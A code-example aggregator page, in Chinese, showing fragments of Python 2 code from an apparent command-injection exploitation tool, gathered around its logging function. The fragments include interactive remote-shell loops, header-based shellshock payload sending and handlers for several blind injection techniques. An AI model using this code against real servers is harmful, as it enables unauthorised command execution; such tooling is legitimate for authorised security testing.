本文整理汇总了Python中src.utils.logs.logs_notification函数的典型用法代码示例。如果您正苦于以下问题:Python logs_notification函数的具体用法?Python logs_notification怎么用?Python logs_notification使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了logs_notification函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: input_cmd
def input_cmd(http_request_method, url, vuln_parameter, ip_src):
    """Run the interactive pseudo-terminal prompt until the process exits.

    Python 2 code (uses ``raw_input``). Each line read from the
    ``Shell > `` prompt is lower-cased and checked against
    ``settings.SHELL_OPTIONS``:

    * ``?``    -> ``menu.shell_options()``
    * ``quit`` -> ``logs.logs_notification(filename)`` then ``os._exit(0)``
    * ``back`` -> ``os._exit(0)`` (the process ends; nothing is returned
      to the caller)
    * any other listed option is ignored.

    Input that is not a listed option is passed unchanged (original
    case) to ``cmd_exec`` together with the four arguments of this
    function.

    NOTE(review): ``filename`` is not a parameter and is not assigned
    here; it has to come from an enclosing scope that this listing does
    not show - confirm it is defined before "quit" is reachable.
    NOTE(review): ``os._exit`` ends the process without running cleanup
    handlers or flushing stdio buffers, and every path exits with status
    0. Only "quit" calls ``logs_notification``; "back", Ctrl-C and any
    error end the session without it, and an error is indistinguishable
    from a clean quit by exit status.
    """
    print("\nPseudo-Terminal (type '?' for shell options)")
    while True:
        try:
            cmd = raw_input("Shell > ")
            option = cmd.lower()
            if option not in settings.SHELL_OPTIONS:
                # Not a built-in option: hand the raw line to cmd_exec.
                cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
                continue
            if option == "?":
                menu.shell_options()
            elif option == "quit":
                logs.logs_notification(filename)
                os._exit(0)
            elif option == "back":
                os._exit(0)
        except:
            # Bare except on purpose: the original handled KeyboardInterrupt
            # and every other exception identically (blank line, exit 0).
            print("")
            os._exit(0)
示例2: execute_file_based_technique
def execute_file_based_technique(url, delay, filename, http_request_method, url_time_response):
# Calls fb_handler.exploitation() with the arguments it was given, prints a
# "not injectable" message when that call returns False, writes a FINISHED
# status line, calls logs.logs_notification(filename) and then sys.exit(0).
# NOTE(review): indentation was lost in this listing, so it cannot be told
# from here which of the statements after the first `if` are nested under
# the `== False` test and which run unconditionally - confirm against the
# original file before relying on the control flow.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) == False:
if http_request_method == "GET":
print Back.RED + "(x) The url '"+ url +"' appear to be not injectable." + Style.RESET_ALL
else:
# NOTE(review): `parameter` is neither an argument nor assigned in this
# function; unless an enclosing scope defines it, this branch raises
# NameError instead of printing the message.
print Back.RED + "(x) The '"+ parameter +"' parameter appear to be not injectable." + Style.RESET_ALL
if menu.options.verbose:
print "\n"
# `percent` holds the coloured status label, not a number.
percent = colors.PURPLE + "FINISHED" + Style.RESET_ALL
# Assumes menu.options.tech is a string here (it is concatenated directly) - TODO confirm.
sys.stdout.write(Style.BRIGHT + "\r(!) The process of testing the "+ menu.options.tech + " injection technique... " + Style.RESET_ALL + "[ " + percent + " ]")
sys.stdout.flush()
# Log notification for the session log identified by `filename`, then exit with status 0.
logs.logs_notification(filename)
sys.exit(0)
示例3: input_cmd
def input_cmd(http_request_method, url, vuln_parameter, ip_src):
    """Run the interactive pseudo-terminal prompt until the process exits.

    Python 2 code (uses ``raw_input``). Every line read from the
    ``Shell > `` prompt is passed to ``cmd_exec`` together with the four
    arguments of this function, except the exact string ``q``, which
    calls ``logs.logs_notification(filename)`` and then ``os._exit(0)``.
    Ctrl-C and any other exception print a blank line and also end the
    process with ``os._exit(0)``.

    NOTE(review): ``filename`` is not a parameter and is not assigned
    here; it has to come from an enclosing scope that this listing does
    not show - confirm it is defined before "q" is reachable.
    NOTE(review): ``os._exit`` ends the process without running cleanup
    handlers or flushing stdio buffers, and every path exits with status
    0. Only "q" calls ``logs_notification``; Ctrl-C and errors end the
    session without it, and an error is indistinguishable from a clean
    quit by exit status.
    """
    print("\nPseudo-Terminal (type 'q' or use <Ctrl-C> to quit)")
    while True:
        try:
            cmd = raw_input("Shell > ")
            if cmd != "q":
                cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
                continue
            logs.logs_notification(filename)
            os._exit(0)
        except:
            # Bare except on purpose: the original handled KeyboardInterrupt
            # and every other exception identically (blank line, exit 0).
            print("")
            os._exit(0)
示例4: main
except httplib.BadStatusLine, e:
print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]"
print e.line, e.message
pass
else:
print Back.RED + "(x) Error: You must specify the target URL." + Style.RESET_ALL + "\n"
sys.exit(0)
# Check if defined "--proxy" option.
if menu.options.proxy:
proxy.do_check(url)
# Launch injection and exploitation controller.
controller.do_check(url, filename)
except KeyboardInterrupt:
print "\n" + Back.RED + "(x) Aborted: Ctrl-C was pressed!" + Style.RESET_ALL
logs.logs_notification(filename)
print ""
sys.exit(0)
except SystemExit:
print ""
sys.exit(0)
if __name__ == '__main__':
main()
#eof
示例5: tfb_injection_handler
#.........这里部分代码省略.........
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
# Delete previous shell (text) files (output) from /tmp
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except SystemExit:
# Delete previous shell (text) files (output) from /tmp
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except:
percent = ((num_of_chars * 100) / total)
float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))
if percent == 100:
if no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
else:
percent = ""
break
else:
percent = str(float_percent)+"%"
#Print logs notification message
percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
print ""
logs.logs_notification(filename)
raise
else:
percent = str(float_percent)+"%"
break
# Yaw, got shellz!
# Do some magic tricks!
if how_long == previous_how_long + delay:
if (len(TAG) == output_length) and (is_vulnerable == True):
found = True
no_result = False
is_vulnerable = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
示例6: tfb_injection_handler
#.........这里部分代码省略.........
continue
if not settings.VERBOSITY_LEVEL >= 1:
info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
except KeyboardInterrupt:
if 'cmd' in locals():
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except SystemExit:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except:
percent = ((num_of_chars * 100) / total)
float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))
if str(float_percent) == "100.0":
if no_result == True:
if not settings.VERBOSITY_LEVEL >= 1:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
else:
percent = ""
else:
percent = str(float_percent) + "%"
print ""
# Print logs notification message
logs.logs_notification(filename)
#raise
else:
percent = str(float_percent) + "%"
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response == 0 and (how_long - delay) >= 0) or \
(url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \
(url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) :
if (len(TAG) == output_length) and \
(possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == menu.options.level):
found = True
no_result = False
if settings.LOAD_SESSION:
possibly_vulnerable = False
if settings.COOKIE_INJECTION == True:
header_name = " cookie"
found_vuln_parameter = vuln_parameter
the_type = " parameter"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
示例7: eb_injection_handler
#.........这里部分代码省略.........
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
if len(found_vuln_parameter) != 0 :
found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL
# Check for any enumeration options.
eb_enumeration.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter)
# Check for any system file access options.
eb_file_access.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter)
# Check if defined single cmd.
if menu.options.os_cmd:
eb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter)
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
logs.logs_notification(filename)
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
break
else:
pass
else:
# The main command injection exploitation.
response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Command execution results.
shell = eb_injector.injection_results(response, TAG)
if shell:
shell = "".join(str(p) for p in shell).replace(" ", "", 1)[:-1]
if shell != "":
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
break
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例8: tfb_injection_handler
#.........这里部分代码省略.........
else:
percent = ""
else:
break
else:
percent = str(percent)+"%"
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
percent = ((num_of_chars * 100) / total)
if percent == 100:
if no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
else:
percent = ""
break
else:
percent = str(percent)+"%"
#Print logs notification message
percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
print ""
logs.logs_notification(filename)
raise
else:
percent = str(percent)+"%"
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay) :
if len(TAG) == output_length:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
示例9: tfb_injection_handler
#.........这里部分代码省略.........
if not menu.options.verbose:
sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
if 'cmd' in locals():
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except SystemExit:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except:
percent = ((num_of_chars * 100) / total)
float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))
if str(float_percent) == "100.0":
if no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
else:
percent = ""
else:
percent = str(float_percent) + "%"
#Print logs notification message
percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
print ""
logs.logs_notification(filename)
raise
else:
percent = str(float_percent) + "%"
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response == 0 and (how_long - delay) >= 0) or \
(url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \
(url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) :
if (len(TAG) == output_length) and \
(is_vulnerable == True or settings.LOAD_SESSION and is_vulnerable == "True"):
found = True
no_result = False
if settings.LOAD_SESSION:
is_vulnerable = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
示例10: shellshock_handler
def shellshock_handler(url, http_request_method, filename):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "results-based command injection"
technique = "shellshock injection technique"
sys.stdout.write("(*) Testing the "+ technique + "... ")
sys.stdout.flush()
try:
i = 0
total = len(shellshock_cves) * len(headers)
for cve in shellshock_cves:
for check_header in headers:
i = i + 1
attack_vector = "echo " + cve + ":Done;"
payload = shellshock_payloads(cve, attack_vector)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)
header = {check_header : payload}
request = urllib2.Request(url, None, header)
response = urllib2.urlopen(request)
if not menu.options.verbose:
percent = ((i*100)/total)
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
elif cve in response.info():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(percent)+"%"
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vuln_parameter = "HTTP Header"
vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
if cve in response.info():
no_result = False
print Style.BRIGHT + "\n(!) The ("+ check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
# Enumeration options.
enumeration(url, cve, check_header)
# File access options.
file_access(url, cve, check_header)
if menu.options.os_cmd:
cmd = menu.options.os_cmd
shell = cmd_exec(url, cmd, cve, check_header)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
sys.exit(0)
else:
while True:
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print "\nPseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
logs.logs_notification(filename)
sys.exit(0)
else:
shell = cmd_exec(url, cmd, cve, check_header)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
except:
print ""
sys.exit(0)
elif gotshell in settings.CHOISE_NO:
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
break
#.........这里部分代码省略.........
示例11: tb_injection_handler
#.........这里部分代码省略.........
continue
if not settings.VERBOSITY_LEVEL >= 1:
info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
except KeyboardInterrupt:
raise
except SystemExit:
raise
except EOFError:
err_msg = "Exiting, due to EOFError."
print settings.print_error_msg(err_msg)
raise
except:
percent = ((num_of_chars * 100) / total)
float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))
if str(float_percent) == "100.0":
if no_result == True:
if not settings.VERBOSITY_LEVEL >= 1:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
else:
percent = ""
else:
percent = str(float_percent) + "%"
print ""
# Print logs notification message
logs.logs_notification(filename)
#raise
else:
percent = str(float_percent) + "%"
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response == 0 and (how_long - timesec) >= 0) or \
(url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \
(url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) :
if (len(TAG) == output_length) and \
(possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == menu.options.level):
found = True
no_result = False
# Check injection state
settings.DETECTION_PHASE = False
settings.EXPLOITATION_PHASE = True
if settings.LOAD_SESSION:
possibly_vulnerable = False
if settings.COOKIE_INJECTION == True:
header_name = " cookie"
found_vuln_parameter = vuln_parameter
the_type = " parameter"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
示例12: tb_injection_handler
#.........这里部分代码省略.........
else:
percent = str(percent)+"%"
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay):
if len(TAG) == output_length :
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
http_request_method = "cookie"
found_vuln_parameter = vuln_parameter
else:
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", urllib.unquote_plus(payload.replace("\n", "\\n"))) + Style.RESET_ALL
# Check for any enumeration options.
tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
# Check for any system file access options.
tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
# Pseudo-Terminal shell
while True:
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
logs.logs_notification(filename)
sys.exit(0)
else:
# The main command injection exploitation.
check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
if menu.options.verbose:
print ""
if output != "" and check_how_long != 0 :
print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
else:
print ""
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
break
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例13: do_check
#.........这里部分代码省略.........
modules_handler.load_modules(url, http_request_method, filename)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
the_type = " HTTP header "
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
check_parameter = ""
the_type = " HTTP header "
# Referer Injection
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
check_parameter = ""
the_type = " HTTP header "
else :
pass
if len(check_parameter) != 0 :
check_parameter = " '" + check_parameter + "'"
print "(*) Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."
# Estimating the response time (in seconds)
delay, url_time_response = requests.estimate_response_time(url, delay)
# Check all injection techniques
if not menu.options.tech:
# Check if it is vulnerable to classic command injection technique.
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
# Check if it is vulnerable to eval-based command injection technique.
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
# Check if it is vulnerable to time-based blind command injection technique.
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
# Check if it is vulnerable to file-based semiblind command injection technique.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
else:
# Check if it is vulnerable to classic command injection technique.
if "classic" in menu.options.tech or len(menu.options.tech) <= 4 and "c" in menu.options.tech:
# Check if classic results-based command injection technique succeeds.
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
elif menu.options.tech == "classic":
cb_handler.exploitation(url, delay, filename, http_request_method)
else:
classic_state = False
# Check if it is vulnerable to eval-based command injection technique.
if "eval-based" in menu.options.tech or len(menu.options.tech) <= 4 and "e" in menu.options.tech:
# Check if eval-based command injection technique succeeds.
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
elif menu.options.tech == "eval-based":
eb_handler.exploitation(url, delay, filename, http_request_method)
else:
eval_based_state = False
# Check if it is vulnerable to time-based blind command injection technique.
if "time-based" in menu.options.tech or len(menu.options.tech) <= 4 and "t" in menu.options.tech:
# Check if time-based blind command injection technique succeeds.
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
elif menu.options.tech == "time-based":
tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
else:
time_based_state = False
# Check if it is vulnerable to file-based semiblind command injection technique.
if "file-based" in menu.options.tech or len(menu.options.tech) <= 4 and "f" in menu.options.tech:
# Check if file-based semiblind command injection technique succeeds.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
elif menu.options.tech == "file-based":
fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
else:
file_based_state = False
if classic_state == False and eval_based_state == False and time_based_state == False and file_based_state == False :
if http_request_method == "GET":
print Back.RED + "(x) The url '"+ url +"' appear to be not injectable." + Style.RESET_ALL
else:
print Back.RED + "(x) The '"+ parameter +"' parameter appear to be not injectable." + Style.RESET_ALL
else:
logs.logs_notification(filename)
sys.exit(0)
#eof
示例14: cb_injection_handler
#.........这里部分代码省略.........
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = str(percent)+"%"
elif len(shell) != 0:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(percent)+"%"
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
continue
# Yaw, got shellz!
# Do some magic tricks!
if shell:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
http_request_method = "cookie"
found_vuln_parameter = vuln_parameter
else:
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL
# Check for any enumeration options.
cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
# Check for any system file access options.
cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
# Pseudo-Terminal shell
while True:
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
logs.logs_notification(filename)
sys.exit(0)
else:
# Command execution results.
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG)
if shell:
shell = "".join(str(p) for p in shell)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
break
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例15: do_check
#.........这里部分代码省略.........
time_based_state = False
file_based_state = False
# Check if defined "--delay" option.
if menu.options.delay:
delay = menu.options.delay
else:
delay = settings.DELAY
# Do authentication if needed.
if menu.options.auth_url and menu.options.auth_data:
authentication.auth_process()
elif menu.options.auth_url or menu.options.auth_data:
print Back.RED + "(x) Error: You must specify both login panel URL and login parameters.\n" + Style.RESET_ALL
sys.exit(0)
else:
pass
# Check if HTTP Method is POST.
if not menu.options.data:
http_request_method = "GET"
else:
http_request_method = "POST"
parameter = menu.options.data
# Load modules
